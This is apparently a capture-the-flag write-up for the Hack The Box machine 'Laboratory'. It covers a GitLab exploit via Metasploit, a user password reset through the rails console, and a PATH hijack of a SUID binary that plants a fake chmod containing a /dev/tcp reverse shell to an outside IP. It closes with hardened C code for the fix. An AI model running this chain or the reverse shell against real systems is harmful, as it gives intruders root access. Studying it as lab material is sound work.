Laboratory

This box has GitLab at https://git.laboratory.htb/, which can be exploited via multi/http/gitlab_file_read_rce on Metasploit. I'm not going too deep on this since I had a very bad time on my first attempt trying some exploits from GitHub and none of them worked, so it's just easier to use Metasploit for this one!

After getting in we have access to the gitlab-rails console, which lets us change users' passwords on GitLab for a smoother experience enumerating GitLab repos, since GitLab had at least one repository owned by dexter.

gitlab-rails console
GitLab:       12.8.1 (d18b43a5f5a) FOSS
Loading production environment (Rails 6.0.2)
irb(main):001:0> user = User.find_by(username: 'dexter')
=> #<User id:1 @dexter>
irb(main):002:0> user.password = 'secret_pass'
=> "secret_pass"
irb(main):003:0> user.password_confirmation = 'secret_pass'
=> "secret_pass"
irb(main):004:0> user.save!
Enqueued ActionMailer::DeliveryJob (Job ID: 1b66de54-3f22-4b3b-86e7-48f8cce37bf4) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #<GlobalID:0x00007f5127fcbe60 @uri=#<URI::GID gid://gitlab/User/1>>
=> true

After logging in and checking out Dexter's repos we found something very useful: an RSA key for dexter (screenshot: dexter rsa).

After running LinEnum as dexter we found the SUID file /usr/local/bin/docker-security, which dexter can run. A SUID binary executes with the privileges of the file's owner, and since root owns this file, if we can control what it executes we can run commands as root. Running file on docker-security told us it is an ELF executable, so the source code is not readable without tools. We downloaded the ELF to the Kali machine and inspected it with Ghidra.

(screenshot: Ghidra decompilation of docker-security)

At first glance it seems to just be changing file permissions with chmod, but it calls chmod without an absolute path, so the lookup goes through the PATH variable inherited from whoever runs the binary. By prepending a directory we control to dexter's PATH and creating an executable called chmod there, we can make this program do whatever we want, as root.


cd /home/dexter
touch chmod
echo '#!/bin/bash
bash -i >& /dev/tcp/10.10.14.50/1337 0>&1' > chmod
export PATH=/home/dexter:$PATH
/usr/local/bin/docker-security

Here we created a file called chmod in dexter's home folder, wrote a script into it that gives us a reverse shell, added the home directory to the front of PATH and finally ran the SUID ELF executable, and we got a shell as root on the box!
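For contrast, this is how a setuid helper like docker-security should invoke chmod so that the caller's PATH cannot redirect it. This is an added example, not the binary's actual source (we only saw it decompiled); it assumes the original resolved the bare name "chmod" through the caller's PATH, and the temp-file self-check and the names chmod_vulnerable, chmod_hardened, sanitize_env and demo are mine.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* Assumed vulnerable pattern: bare "chmod" resolved via the caller's PATH. */
int chmod_vulnerable(const char *target) {
    char cmd[512];
    snprintf(cmd, sizeof cmd, "chmod 0700 %s", target);
    return system(cmd);   /* inherits PATH; also shell-injectable via target */
}

/* Hardened: fixed PATH, no shell, absolute path to the binary. */
static const char *SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin";
void sanitize_env(void) {
    clearenv();                      /* drops LD_PRELOAD, IFS, PATH, ... */
    setenv("PATH", SAFE_PATH, 1);
}

int chmod_hardened(const char *target) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        sanitize_env();
        char *const argv[] = {"chmod", "0700", (char *)target, NULL};
        execv("/bin/chmod", argv);      /* absolute path: PATH is irrelevant */
        execv("/usr/bin/chmod", argv);  /* fallback for merged-/usr layouts */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Self-check on a constructed temp file: 1 if the mode became 0700 even with a
 * PATH that starts with a world-writable directory, as in the attack above. */
int demo(void) {
    setenv("PATH", "/tmp:/usr/bin:/bin", 1);
    char path[] = "/tmp/docsec-demo-XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) return 0;
    close(fd);
    int rc = chmod_hardened(path);
    struct stat st;
    int ok = rc == 0 && stat(path, &st) == 0 && (st.st_mode & 07777) == 0700;
    unlink(path);
    return ok;
}
```

The same lookup hijack also works against relative names passed to system() or popen() in any setuid program, which is why clearing the environment before exec, rather than only fixing this one call, is the durable fix.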